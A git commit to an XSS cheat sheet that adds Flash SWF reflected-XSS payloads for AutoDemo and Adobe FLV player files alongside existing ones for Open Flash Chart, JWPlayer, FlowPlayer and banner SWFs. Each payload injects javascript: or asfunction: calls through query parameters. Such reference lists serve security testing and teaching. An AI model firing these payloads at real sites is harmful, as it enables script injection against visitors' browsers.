[XSS] add extra SWF refs from notes

2024-11-22 02:53:06 +00:00 · 2017-10-01 10:19:34 +01:00 · 2017-10-01 10:19:34 +01:00 · 74b9508019
commit 74b9508019
parent 60c998c43d
1 changed files with 5 additions and 1 deletions
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@ -128,6 +128,10 @@ javas&#x09;cript://www.google.com/%0Aalert(1)

 - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`

+- AutoDemo: `control.swf?onend=javascript:alert(1)//`
+
+- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
+
 - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`

 - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
@ -136,7 +140,7 @@ javas&#x09;cript://www.google.com/%0Aalert(1)

 - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`

-_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
+_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._

 **Lightweight Markup Languages**